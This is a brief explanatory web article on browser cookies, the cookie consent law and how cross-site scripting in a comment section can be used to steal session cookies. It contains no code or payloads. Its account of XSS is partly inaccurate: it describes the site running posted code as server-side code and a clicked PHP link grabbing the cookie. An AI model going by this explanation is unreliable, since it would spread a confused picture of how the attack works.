A cookie is a randomly generated alphanumeric string which is generated when you visit a webpage and is sent to your browser by that webpage to be kept as a record of your presence on that website so that you can be recognized by that site when you visit it again because of your previous session(known as session ID). But that’s not the only purpose of cookies they are also extensively used to keep a track of your preferences online and they travel from one server to another and can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.
The Cookie Trail
The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and give them a choice to allow it or not.
Shopping preferences might not classify as sensitive information about an individual but online shopping carts and banking details are really sensitive data and all of this is also remembered by a site with the help of session cookies. If an attacker manages to get a hold of your session cookies then that person will be able to pose as you and that site and will have access to your banking details and your amazon shopping cart and might order stuff from your amazon account to his/her address spending all your money. This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability. This is found mostly in badly-coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.
How websites use XSS to steal cookies?
I’m going to explain this with a hypothetical scenario. So lets say we visit one such vulnerable site which has a comments section on it. Now on an ideal, secure website a comment section should only have text in plain English but on an unsecure site, if we post a code in the comment section the site would think that it is some code from the server side and it is supposed to run that code.
- When some user visiting the site looks at the comment section he/she will see a link to an image in the comments section which is actually the result of the script running.
- When a user clicks on this link thinking that it is an image (whereas it actually is a php file) they get an image rendered in the comment section. What they don’t know is that this link silently executed a php file which grabs their cookie.
- Now, the cookie which has that users session ID is saved in the attackers database and the attacker can pose as that user on that site.
References: Computerhile – YouTube channel
Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above.